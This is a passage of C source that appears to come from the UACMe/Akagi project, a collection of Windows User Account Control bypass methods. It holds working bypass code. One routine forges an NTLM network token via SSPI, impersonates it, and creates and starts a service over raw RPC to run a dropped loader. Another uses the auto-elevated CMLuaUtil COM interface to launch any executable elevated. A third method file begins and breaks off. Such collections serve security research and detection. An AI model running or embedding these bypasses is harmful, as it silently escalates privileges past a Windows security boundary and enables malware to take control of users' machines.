    WORD wProcedureNumber;
} RPC_REQUEST_HEADER, *PRPC_REQUEST_HEADER;

typedef struct _RPC_RESPONSE_HEADER {
    DWORD dwAllocHint;
    WORD wContextID;
    BYTE bCancelCount;
    BYTE bAlign[1];
} RPC_RESPONSE_HEADER, *PRPC_RESPONSE_HEADER;

typedef struct _RPC_BIND_REQUEST_CONTEXT_ENTRY {
    WORD wContextID;
    WORD wTransItemCount;
    UUID InterfaceUUID;
    DWORD dwInterfaceVersion;
    UUID TransferSyntaxUUID;
    DWORD dwTransferSyntaxVersion;
} RPC_BIND_REQUEST_CONTEXT_ENTRY, *PRPC_BIND_REQUEST_CONTEXT_ENTRY;

typedef struct _RPC_BIND_REQUEST_HEADER {
    WORD wMaxSendFrag;
    WORD wMaxRecvFrag;
    DWORD dwAssocGroup;
    BYTE bContextCount;
    BYTE bAlign[3];
    RPC_BIND_REQUEST_CONTEXT_ENTRY Context;
} RPC_BIND_REQUEST_HEADER, *PRPC_BIND_REQUEST_HEADER;

typedef struct _RPC_BIND_RESPONSE_CONTEXT_ENTRY {
    WORD wResult;
    WORD wAlign;
    BYTE bTransferSyntax[16];
    DWORD dwTransferSyntaxVersion;
} RPC_BIND_RESPONSE_CONTEXT_ENTRY, *PRPC_BIND_RESPONSE_CONTEXT_ENTRY;

typedef struct _RPC_BIND_RESPONSE_HEADER1 {
    WORD wMaxSendFrag;
    WORD wMaxRecvFrag;
    DWORD dwAssocGroup;
} RPC_BIND_RESPONSE_HEADER1, *PRPC_BIND_RESPONSE_HEADER1;

typedef struct _RPC_BIND_RESPONSE_HEADER2 {
    DWORD dwContextResultCount;
    RPC_BIND_RESPONSE_CONTEXT_ENTRY Context;
} RPC_BIND_RESPONSE_HEADER2, *PRPC_BIND_RESPONSE_HEADER2;

typedef struct _RPC_CONNECTION {
    HANDLE hFile;
    DWORD dwCallIndex;
    DWORD dwInputError;
    DWORD dwRequestInitialized;
    BYTE bProcedureInputData[MAX_PROCEDURE_DATA_LENGTH];
    DWORD dwProcedureInputDataLength;
    BYTE bProcedureOutputData[MAX_PROCEDURE_DATA_LENGTH];
    DWORD dwProcedureOutputDataLength;
} RPC_CONNECTION, *PRPC_CONNECTION;

BOOL ucmxRpcBind(
    _In_ PRPC_CONNECTION pRpcConnection,
    _In_ RPC_WSTR pInterfaceUUID,
    _In_ DWORD dwInterfaceVersion)
{
    RPC_BASE_HEADER RpcBaseHeader;
    RPC_BIND_REQUEST_HEADER RpcBindRequestHeader;
    DWORD dwBytesWritten = 0;
    DWORD dwBytesRead = 0;
    BYTE bResponseData[MAX_RPC_PACKET_LENGTH];
    RPC_BASE_HEADER* pRpcResponseBaseHeader = NULL;
    RPC_BIND_RESPONSE_HEADER1* pRpcBindResponseHeader1 = NULL;
    RPC_BIND_RESPONSE_HEADER2* pRpcBindResponseHeader2 = NULL;
    BYTE* pSecondaryAddrHeaderBlock = NULL;
    WORD wSecondaryAddrLen = 0;
    DWORD dwSecondaryAddrAlign = 0;

    //
    // Set base header details.
    //
    RtlSecureZeroMemory(&RpcBaseHeader, sizeof(RpcBaseHeader));
    RpcBaseHeader.wVersion = 5;
    RpcBaseHeader.bPacketType = 11;   // bind
    RpcBaseHeader.bPacketFlags = 3;   // first and last fragment
    RpcBaseHeader.dwDataRepresentation = 0x10;
    RpcBaseHeader.wFragLength = (WORD)(sizeof(RpcBaseHeader) + sizeof(RpcBindRequestHeader));
    RpcBaseHeader.wAuthLength = 0;
    RpcBaseHeader.dwCallIndex = pRpcConnection->dwCallIndex;

    //
    // Set bind request header details.
    //
    RtlSecureZeroMemory(&RpcBindRequestHeader, sizeof(RpcBindRequestHeader));
    RpcBindRequestHeader.wMaxSendFrag = MAX_RPC_PACKET_LENGTH;
    RpcBindRequestHeader.wMaxRecvFrag = MAX_RPC_PACKET_LENGTH;
    RpcBindRequestHeader.dwAssocGroup = 0;
    RpcBindRequestHeader.bContextCount = 1;
    RpcBindRequestHeader.Context.wContextID = 0;
    RpcBindRequestHeader.Context.wTransItemCount = 1;
    RpcBindRequestHeader.Context.dwTransferSyntaxVersion = 2;

    if (RPC_S_OK != UuidFromString(pInterfaceUUID, &RpcBindRequestHeader.Context.InterfaceUUID))
        return FALSE;

    RpcBindRequestHeader.Context.dwInterfaceVersion = dwInterfaceVersion;

    if (RPC_S_OK != UuidFromString(RPC_NDR_UUID, &RpcBindRequestHeader.Context.TransferSyntaxUUID))
        return FALSE;

    //
    // Write base header.
    //
    if (!WriteFile(pRpcConnection->hFile, &RpcBaseHeader, sizeof(RpcBaseHeader), &dwBytesWritten, NULL)) {
        return FALSE;
    }

    //
    // Write bind request header.
    //
    if (!WriteFile(pRpcConnection->hFile, &RpcBindRequestHeader, sizeof(RpcBindRequestHeader), &dwBytesWritten, NULL)) {
        return FALSE;
    }

    pRpcConnection->dwCallIndex++;

    //
    // Get bind response.
    //
    RtlSecureZeroMemory(&bResponseData, sizeof(bResponseData));
    if (!ReadFile(pRpcConnection->hFile, bResponseData, sizeof(bResponseData), &dwBytesRead, NULL)) {
        return FALSE;
    }

    //
    // Get a ptr to the base response header.
    //
    pRpcResponseBaseHeader = (PRPC_BASE_HEADER)bResponseData;

    //
    // Validate base response header.
    //
    if ((pRpcResponseBaseHeader->wVersion != 5) ||
        (pRpcResponseBaseHeader->bPacketType != 12) ||   // bind_ack
        (pRpcResponseBaseHeader->bPacketFlags != 3) ||
        (pRpcResponseBaseHeader->wFragLength != dwBytesRead))
    {
        return FALSE;
    }

    //
    // Get a ptr to the main bind response header body.
    //
    pRpcBindResponseHeader1 = (PRPC_BIND_RESPONSE_HEADER1)RtlOffsetToPointer((BYTE*)pRpcResponseBaseHeader, sizeof(RPC_BASE_HEADER));

    //
    // Get secondary addr header ptr.
    //
    pSecondaryAddrHeaderBlock = (BYTE*)RtlOffsetToPointer((BYTE*)pRpcBindResponseHeader1, sizeof(RPC_BIND_RESPONSE_HEADER1));
    wSecondaryAddrLen = *(WORD*)pSecondaryAddrHeaderBlock;

    //
    // Validate secondary addr length.
    //
    if (wSecondaryAddrLen > 256)
        return FALSE;

    //
    // Calculate padding for secondary addr value if necessary.
    //
    dwSecondaryAddrAlign = CALC_ALIGN_PADDING((sizeof(WORD) + wSecondaryAddrLen), sizeof(ULONG));

    //
    // Get a ptr to the main bind response header body (after the variable-length secondary addr field).
    //
    pRpcBindResponseHeader2 = (PRPC_BIND_RESPONSE_HEADER2)RtlOffsetToPointer((BYTE*)pSecondaryAddrHeaderBlock,
        sizeof(WORD) + wSecondaryAddrLen + dwSecondaryAddrAlign);

    //
    // Validate context count.
    // Ensure the result value for context #1 was successful.
    //
    if ((pRpcBindResponseHeader2->dwContextResultCount != 1) ||
        (pRpcBindResponseHeader2->Context.wResult != 0))
    {
        return FALSE;
    }

    return TRUE;
}

BOOL ucmxRpcConnect(
    _In_ LPCWSTR lpPipeName,
    _In_ RPC_WSTR pInterfaceUUID,
    _In_ DWORD dwInterfaceVersion,
    _In_ PRPC_CONNECTION pRpcConnection)
{
    HANDLE hFile = NULL;
    WCHAR szPipePath[MAX_PATH * 2];
    RPC_CONNECTION RpcConnection;

    //
    // Set pipe path.
    //
    RtlSecureZeroMemory(szPipePath, sizeof(szPipePath));
    _strcpy(szPipePath, TEXT("\\\\127.0.0.1\\pipe\\"));
    _strcat(szPipePath, lpPipeName);

    //
    // Open rpc pipe.
    //
    hFile = CreateFile(szPipePath,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
        return FALSE;

    //
    // Initialize rpc connection data.
    //
    RtlSecureZeroMemory(&RpcConnection, sizeof(RpcConnection));
    RpcConnection.hFile = hFile;
    RpcConnection.dwCallIndex = 1;

    //
    // Bind rpc connection.
    //
    if (!ucmxRpcBind(&RpcConnection, pInterfaceUUID, dwInterfaceVersion)) {
        // The caller never sees this handle on failure, so release it here.
        CloseHandle(hFile);
        return FALSE;
    }

    //
    // Store connection data.
    //
    RtlCopyMemory(pRpcConnection, &RpcConnection, sizeof(RpcConnection));

    return TRUE;
}

VOID ucmxRpcInitializeRequestData(
    _In_ PRPC_CONNECTION pRpcConnection)
{
    //
    // Initialize request data.
    //
    RtlSecureZeroMemory(pRpcConnection->bProcedureInputData, sizeof(pRpcConnection->bProcedureInputData));
    pRpcConnection->dwProcedureInputDataLength = 0;
    RtlSecureZeroMemory(pRpcConnection->bProcedureOutputData, sizeof(pRpcConnection->bProcedureOutputData));
    pRpcConnection->dwProcedureOutputDataLength = 0;

    //
    // Reset input error flag.
    //
    pRpcConnection->dwInputError = 0;
    pRpcConnection->dwRequestInitialized = 1;
}

BOOL ucmxRpcSendRequest(
    _In_ PRPC_CONNECTION pRpcConnection,
    _In_ DWORD dwProcedureNumber)
{
    RPC_BASE_HEADER RpcBaseHeader;
    RPC_REQUEST_HEADER RpcRequestHeader;
    DWORD dwBytesWritten = 0;
    BYTE bResponseData[MAX_RPC_PACKET_LENGTH];
    RPC_BASE_HEADER* pRpcResponseBaseHeader = NULL;
    RPC_RESPONSE_HEADER* pRpcResponseHeader = NULL;
    DWORD dwProcedureResponseDataLength = 0;
    DWORD dwBytesRead = 0;
    BYTE* pTempProcedureResponseDataPtr = NULL;

    //
    // Ensure rpc request has been initialized.
    //
    if (pRpcConnection->dwRequestInitialized == 0)
        return FALSE;

    //
    // Clear initialised flag.
    //
    pRpcConnection->dwRequestInitialized = 0;

    //
    // Check for input errors.
    //
    if (pRpcConnection->dwInputError != 0)
        return FALSE;

    //
    // Set base header details.
    //
    RtlSecureZeroMemory(&RpcBaseHeader, sizeof(RpcBaseHeader));
    RpcBaseHeader.wVersion = 5;
    RpcBaseHeader.bPacketType = 0;    // request
    RpcBaseHeader.bPacketFlags = 3;   // first and last fragment
    RpcBaseHeader.dwDataRepresentation = 0x10;
    RpcBaseHeader.wFragLength = (WORD)(sizeof(RPC_BASE_HEADER) + sizeof(RPC_REQUEST_HEADER) + pRpcConnection->dwProcedureInputDataLength);
    RpcBaseHeader.wAuthLength = 0;
    RpcBaseHeader.dwCallIndex = pRpcConnection->dwCallIndex;

    //
    // Set request header details.
    //
    RtlSecureZeroMemory(&RpcRequestHeader, sizeof(RpcRequestHeader));
    RpcRequestHeader.dwAllocHint = 0;
    RpcRequestHeader.wContextID = 0;
    RpcRequestHeader.wProcedureNumber = (WORD)dwProcedureNumber;

    //
    // Write base header.
    //
    if (!WriteFile(pRpcConnection->hFile, &RpcBaseHeader, sizeof(RpcBaseHeader), &dwBytesWritten, NULL)) {
        return FALSE;
    }

    //
    // Write request header.
    //
    if (!WriteFile(pRpcConnection->hFile, &RpcRequestHeader, sizeof(RpcRequestHeader), &dwBytesWritten, NULL)) {
        return FALSE;
    }

    //
    // Write request body.
    //
    if (!WriteFile(pRpcConnection->hFile, pRpcConnection->bProcedureInputData, pRpcConnection->dwProcedureInputDataLength, &dwBytesWritten, NULL)) {
        return FALSE;
    }

    //
    // Increase call index.
    //
    pRpcConnection->dwCallIndex++;

    //
    // Get response.
    //
    RtlSecureZeroMemory(&bResponseData, sizeof(bResponseData));
    if (!ReadFile(pRpcConnection->hFile, bResponseData, sizeof(bResponseData), &dwBytesRead, NULL)) {
        return FALSE;
    }

    //
    // Get a ptr to the base response header.
    //
    pRpcResponseBaseHeader = (PRPC_BASE_HEADER)bResponseData;

    //
    // Validate base response header.
    //
    if ((pRpcResponseBaseHeader->wVersion != 5) ||
        (pRpcResponseBaseHeader->bPacketType != 2) ||   // response
        (pRpcResponseBaseHeader->bPacketFlags != 3) ||
        (pRpcResponseBaseHeader->wFragLength != dwBytesRead))
    {
        return FALSE;
    }

    //
    // Get a ptr to the main response header body.
    //
    pRpcResponseHeader = (RPC_RESPONSE_HEADER*)RtlOffsetToPointer((BYTE*)pRpcResponseBaseHeader, sizeof(RPC_BASE_HEADER));

    //
    // Context ID must be 0.
    //
    if (pRpcResponseHeader->wContextID != 0)
        return FALSE;

    //
    // Calculate command response data length.
    //
    dwProcedureResponseDataLength = pRpcResponseBaseHeader->wFragLength - sizeof(RPC_BASE_HEADER) - sizeof(RPC_RESPONSE_HEADER);

    //
    // Store response data.
    // A fragment shorter than the two headers underflows here and is rejected by the size check.
    //
    if (dwProcedureResponseDataLength > sizeof(pRpcConnection->bProcedureOutputData))
        return FALSE;

    pTempProcedureResponseDataPtr = (BYTE*)RtlOffsetToPointer((BYTE*)pRpcResponseHeader, sizeof(RPC_RESPONSE_HEADER));
    RtlCopyMemory(pRpcConnection->bProcedureOutputData, pTempProcedureResponseDataPtr, dwProcedureResponseDataLength);

    //
    // Store response data length.
    //
    pRpcConnection->dwProcedureOutputDataLength = dwProcedureResponseDataLength;

    return TRUE;
}

BOOL ucmxRpcAppendRequestData_Binary(
    _In_ PRPC_CONNECTION RpcConnection,
    _In_ BYTE* Data,
    _In_ DWORD DataLength,
    _In_ BOOL IsUnicode)
{
    DWORD dwBytesAvailable = 0;
    DWORD dwDataLength = DataLength;
    DWORD dwPadding = 0;

    // For wide strings DataLength is a character count; convert to bytes.
    if (IsUnicode)
        dwDataLength *= sizeof(WCHAR);

    //
    // Ensure the request has been initialized.
    //
    if (RpcConnection->dwRequestInitialized == 0)
        return FALSE;

    dwPadding = CALC_ALIGN_PADDING(dwDataLength, sizeof(ULONG));

    //
    // Calculate number of bytes remaining in the input buffer.
    //
    dwBytesAvailable = sizeof(RpcConnection->bProcedureInputData) - RpcConnection->dwProcedureInputDataLength;
    if ((dwDataLength + dwPadding) > dwBytesAvailable) {
        //
        // Set input error flag.
        //
        RpcConnection->dwInputError = 1;
        return FALSE;
    }

    //
    // Store data in buffer.
    //
    RtlCopyMemory(&RpcConnection->bProcedureInputData[RpcConnection->dwProcedureInputDataLength], Data, dwDataLength);
    RpcConnection->dwProcedureInputDataLength += dwDataLength;
    RpcConnection->dwProcedureInputDataLength += dwPadding;

    return TRUE;
}

BOOL ucmxRpcAppendRequestData_Dword(
    _In_ PRPC_CONNECTION pRpcConnection,
    _In_ DWORD dwValue)
{
    return ucmxRpcAppendRequestData_Binary(
        pRpcConnection,
        (BYTE*)&dwValue,
        sizeof(DWORD),
        FALSE);
}

BOOL ucmxInvokeCreateSvcRpcMain(
    _In_ LPWSTR lpszPayload)
{
    BOOL bResult = FALSE;
    RPC_CONNECTION RpcConnection;
    BYTE bServiceManagerObject[20];
    BYTE bServiceObject[20];
    DWORD dwReturnValue = 0;
    DWORD dwServiceNameLength = 0;
    WCHAR szServiceName[32];
    DWORD dwServiceCommandLineLength = 0;

    RpcConnection.hFile = INVALID_HANDLE_VALUE;

    do {
        //
        // Generate random name for service.
        //
        szServiceName[0] = 0;
        supBinTextEncode(supGetTickCount64(), szServiceName);
        dwServiceNameLength = (DWORD)(_strlen(szServiceName) + 1);
        dwServiceCommandLineLength = (DWORD)(_strlen(lpszPayload) + 1);

        if (!ucmxRpcConnect(TEXT("ntsvcs"), SVCCTL_UUID, 2, &RpcConnection))
            break;

        //
        // OpenSCManager.
        //
        ucmxRpcInitializeRequestData(&RpcConnection);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, SC_MANAGER_ALL_ACCESS);

        if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_OPEN_SC_MANAGERW))
            break;

        if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_OPEN_SC_MANAGER)
            break;

        dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[20];
        if (dwReturnValue != 0)
            break;

        RtlCopyMemory(bServiceManagerObject, &RpcConnection.bProcedureOutputData[0], sizeof(bServiceManagerObject));

        //
        // CreateService RPC request.
        //
        ucmxRpcInitializeRequestData(&RpcConnection);
        ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceManagerObject, sizeof(bServiceManagerObject), FALSE);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceNameLength);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceNameLength);
        ucmxRpcAppendRequestData_Binary(&RpcConnection, (BYTE*)szServiceName, dwServiceNameLength, TRUE);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_ALL_ACCESS);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_WIN32_OWN_PROCESS);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_DEMAND_START);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_ERROR_IGNORE);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceCommandLineLength);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceCommandLineLength);
        ucmxRpcAppendRequestData_Binary(&RpcConnection, (BYTE*)lpszPayload, dwServiceCommandLineLength, TRUE);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);

        if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_CREATE_SERVICEW))
            break;

        if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_CREATE_SERVICE)
            break;

        dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[24];
        if (dwReturnValue != 0)
            break;

        RtlCopyMemory(bServiceObject, &RpcConnection.bProcedureOutputData[4], sizeof(bServiceObject));

        //
        // StartService RPC request.
        //
        ucmxRpcInitializeRequestData(&RpcConnection);
        ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceObject, sizeof(bServiceObject), FALSE);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);
        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);

        if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_START_SERVICEW))
            break;

        if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_START_SERVICE)
            break;

        dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[0];
        if (dwReturnValue != 0 && dwReturnValue != ERROR_SERVICE_REQUEST_TIMEOUT)
            break;

        //
        // DeleteService RPC request.
        //
        ucmxRpcInitializeRequestData(&RpcConnection);
        ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceObject, sizeof(bServiceObject), FALSE);

        if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_DELETE_SERVICE))
            break;

        if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_DELETE_SERVICE)
            break;

        dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[0];
        if (dwReturnValue != 0)
            break;

        bResult = TRUE;

    } while (FALSE);

    if (RpcConnection.hFile != INVALID_HANDLE_VALUE)
        CloseHandle(RpcConnection.hFile);

    return bResult;
}

SECURITY_STATUS ucmxForgeNetworkAuthToken(
    _Out_ PHANDLE TokenHandle
)
{
    CredHandle hCredClient, hCredServer;
    TimeStamp lifetimeClient, lifetimeServer;
    SecBufferDesc negotiateDesc, challengeDesc, authenticateDesc;
    SecBuffer negotiateBuffer, challengeBuffer, authenticateBuffer;
    CtxtHandle clientContextHandle, serverContextHandle;
    ULONG clientContextAttributes, serverContextAttributes;
    SECURITY_STATUS secStatus;
    HANDLE hTokenNetwork = NULL;

    *TokenHandle = NULL;

    serverContextHandle.dwLower = 0;
    serverContextHandle.dwUpper = 0;
    clientContextHandle.dwLower = 0;
    clientContextHandle.dwUpper = 0;
    hCredClient.dwLower = 0;
    hCredClient.dwUpper = 0;
    hCredServer.dwLower = 0;
    hCredServer.dwUpper = 0;

    RtlSecureZeroMemory(&negotiateBuffer, sizeof(negotiateBuffer));
    RtlSecureZeroMemory(&challengeBuffer, sizeof(challengeBuffer));
    RtlSecureZeroMemory(&authenticateBuffer, sizeof(authenticateBuffer));

    do {

        secStatus = AcquireCredentialsHandle(NULL,
            (LPWSTR)NTLMSP_NAME,
            SECPKG_CRED_OUTBOUND,
            NULL,
            NULL,
            NULL,
            NULL,
            &hCredClient,
            &lifetimeClient);

        if (!NT_SUCCESS(secStatus))
            break;

        secStatus = AcquireCredentialsHandle(NULL,
            (LPWSTR)NTLMSP_NAME,
            SECPKG_CRED_INBOUND,
            NULL,
            NULL,
            NULL,
            NULL,
            &hCredServer,
            &lifetimeServer);

        if (!NT_SUCCESS(secStatus))
            break;

        negotiateDesc.ulVersion = 0;
        negotiateDesc.cBuffers = 1;
        negotiateDesc.pBuffers = &negotiateBuffer;
        negotiateBuffer.cbBuffer = MAX_MESSAGE_SIZE;
        negotiateBuffer.BufferType = SECBUFFER_TOKEN;
        negotiateBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);
        if (negotiateBuffer.pvBuffer == NULL) {
            secStatus = SEC_E_INSUFFICIENT_MEMORY;
            break;
        }

        secStatus = InitializeSecurityContext(&hCredClient,
            NULL,
            NULL,
            ISC_REQ_DATAGRAM,
            0,
            SECURITY_NATIVE_DREP,
            NULL,
            0,
            &clientContextHandle,
            &negotiateDesc,
            &clientContextAttributes,
            &lifetimeClient);

        if (!NT_SUCCESS(secStatus))
            break;

        challengeDesc.ulVersion = 0;
        challengeDesc.cBuffers = 1;
        challengeDesc.pBuffers = &challengeBuffer;
        challengeBuffer.cbBuffer = MAX_MESSAGE_SIZE;
        challengeBuffer.BufferType = SECBUFFER_TOKEN;
        challengeBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);
        if (challengeBuffer.pvBuffer == NULL) {
            secStatus = SEC_E_INSUFFICIENT_MEMORY;
            break;
        }

        secStatus = AcceptSecurityContext(&hCredServer,
            NULL,
            &negotiateDesc,
            ASC_REQ_DATAGRAM,
            SECURITY_NATIVE_DREP,
            &serverContextHandle,
            &challengeDesc,
            &serverContextAttributes,
            &lifetimeServer);

        if (!NT_SUCCESS(secStatus))
            break;

        authenticateDesc.ulVersion = 0;
        authenticateDesc.cBuffers = 1;
        authenticateDesc.pBuffers = &authenticateBuffer;
        authenticateBuffer.cbBuffer = MAX_MESSAGE_SIZE;
        authenticateBuffer.BufferType = SECBUFFER_TOKEN;
        authenticateBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);
        if (authenticateBuffer.pvBuffer == NULL) {
            secStatus = SEC_E_INSUFFICIENT_MEMORY;
            break;
        }

        secStatus = InitializeSecurityContext(NULL,
            &clientContextHandle,
            NULL,
            0,
            0,
            SECURITY_NATIVE_DREP,
            &challengeDesc,
            0,
            &clientContextHandle,
            &authenticateDesc,
            &clientContextAttributes,
            &lifetimeClient);

        if (!NT_SUCCESS(secStatus))
            break;

        secStatus = AcceptSecurityContext(NULL,
            &serverContextHandle,
            &authenticateDesc,
            0,
            SECURITY_NATIVE_DREP,
            &serverContextHandle,
            NULL,
            &serverContextAttributes,
            &lifetimeServer);

        if (!NT_SUCCESS(secStatus))
            break;

        secStatus = QuerySecurityContextToken(&serverContextHandle, &hTokenNetwork);

    } while (FALSE);

    if (negotiateBuffer.pvBuffer)
        supHeapFree(negotiateBuffer.pvBuffer);
    if (challengeBuffer.pvBuffer)
        supHeapFree(challengeBuffer.pvBuffer);
    if (authenticateBuffer.pvBuffer)
        supHeapFree(authenticateBuffer.pvBuffer);

    FreeCredentialsHandle(&hCredClient);
    FreeCredentialsHandle(&hCredServer);

    DeleteSecurityContext(&clientContextHandle);
    DeleteSecurityContext(&serverContextHandle);

    *TokenHandle = hTokenNetwork;

    return secStatus;
}

/*
* ucmSspiDatagramMethod
*
* Purpose:
*
* Bypass UAC using SSPI datagram context.
*
* Fixed by MS ninja patch (including old Win10 releases).
*
*/
NTSTATUS ucmSspiDatagramMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    BOOL bNeedCleanup = FALSE, bImpersonate = FALSE;
    SECURITY_IMPERSONATION_LEVEL impLevel;
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    HANDLE hToken = NULL;
    WCHAR szLoaderFileName[MAX_PATH * 2];

    //
    // Forge token for impersonation.
    //
    MethodResult = ucmxForgeNetworkAuthToken(&hToken);
    if (!NT_SUCCESS(MethodResult))
        return MethodResult;

    do {

        MethodResult = STATUS_ACCESS_DENIED;

        //
        // Write loader to the %temp%
        //
        if (!supReplaceDllEntryPoint(
            ProxyDll,
            ProxyDllSize,
            AKATSUKI_ENTRYPOINT_EXE,
            TRUE))
        {
            break;
        }

        RtlSecureZeroMemory(&szLoaderFileName, sizeof(szLoaderFileName));
        _strcpy(szLoaderFileName, g_ctx->szTempDirectory);
        _strcat(szLoaderFileName, THEOLDNEWTHING);
        _strcat(szLoaderFileName, TEXT(".exe"));

        bNeedCleanup = supWriteBufferToFile(szLoaderFileName, ProxyDll, ProxyDllSize);
        if (!bNeedCleanup)
            break;

        bImpersonate = ImpersonateLoggedOnUser(hToken);
        if (!bImpersonate)
            break;

        if (!supGetThreadTokenImpersonationLevel(NtCurrentThread(), &impLevel))
            break;

        if (impLevel < SecurityImpersonation)
            break;

        if (ucmxInvokeCreateSvcRpcMain(szLoaderFileName))
            MethodResult = STATUS_SUCCESS;

    } while (FALSE);

    if (bImpersonate)
        RevertToSelf();

    if (hToken)
        CloseHandle(hToken);

    if (bNeedCleanup)
        DeleteFile(szLoaderFileName);

    return MethodResult;
}

================================================
FILE: Source/Akagi/methods/api0cradle.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2017 - 2022
*
*  TITLE:       API0CRADLE.C
*
*  VERSION:     3.61
*
*  DATE:        22 Jun 2022
*
*  UAC bypass method from Oddvar Moe aka api0cradle.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"

/*
* ucmCMLuaUtilShellExecMethod
*
* Purpose:
*
* Bypass UAC using AutoElevated undocumented CMLuaUtil interface.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
NTSTATUS ucmCMLuaUtilShellExecMethod(
    _In_ LPWSTR lpszExecutable
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    HRESULT r, hr_init;
    ICMLuaUtil* CMLuaUtil = NULL;

    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

    do {

        r = ucmAllocateElevatedObject(
            T_CLSID_CMSTPLUA,
            &IID_ICMLuaUtil,
            CLSCTX_LOCAL_SERVER,
            (void**)&CMLuaUtil);

        if (r != S_OK)
            break;

        if (CMLuaUtil == NULL)
            break;

        r = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil,
            lpszExecutable,
            NULL,
            NULL,
            SEE_MASK_DEFAULT,
            SW_SHOW);

        if (SUCCEEDED(r))
            MethodResult = STATUS_SUCCESS;

    } while (FALSE);

    if (CMLuaUtil != NULL) {
        CMLuaUtil->lpVtbl->Release(CMLuaUtil);
    }

    if (hr_init == S_OK)
        CoUninitialize();

    return MethodResult;
}

================================================
FILE: Source/Akagi/methods/azagarampur.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2020 - 2025
*
*  TITLE:       AZAGARAMPUR.C
*
*  VERSION:     3.69
*
*  DATE:        07 Jul 2025
*
*  UAC bypass methods from AzAgarampur.
*
*  For description please visit original URL
*
*  https://github.com/AzAgarampur/byeintegrity-uac
*  https://github.com/AzAgarampur/byeintegrity2-uac
*  https://github.com/AzAgarampur/byeintegrity3-uac
*  https://github.com/AzAgarampur/byeintegrity4-uac
*  https://github.com/AzAgarampur/byeintegrity-lite
*  https://github.com/AzAgarampur/byeintegrity7-uac
*  https://github.com/AzAgarampur/byeintegrity8-uac
*  https://github.com/AzAgarampur/byeintegrity9-uac
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"

#ifdef _WIN64
#include "pcasvc/w7/x64/pcasvc7_64.h"
#include "pcasvc/w8_10/x64/pcasvc64.h"
#else
#include "pcasvc/w7/x86-32/pcasvc7_32.h"
#include "pcasvc/w8_10/x86-32/pcasvc32.h"
#endif

/*
* ucmxNgenLogLastWrite
*
* Purpose:
*
* Query ngen.log last write time.
*
*/
BOOL ucmxNgenLogLastWrite(
    _Out_ FILETIME* LastWriteTime
)
{
    BOOL bResult = FALSE;
    HANDLE hFile;
    WCHAR szFileName[MAX_PATH * 2];

    LastWriteTime->dwLowDateTime = 0;
    LastWriteTime->dwHighDateTime = 0;

    _strcpy(szFileName, g_ctx->szSystemRoot);
    _strcat(szFileName, MSNETFRAMEWORK_DIR);
#ifdef _WIN64
    _strcat(szFileName, TEXT("64"));
#endif
    _strcat(szFileName, TEXT("\\"));
    _strcat(szFileName, NET4_DIR);
    _strcat(szFileName, TEXT("\\"));
    _strcat(szFileName, TEXT("ngen.log"));

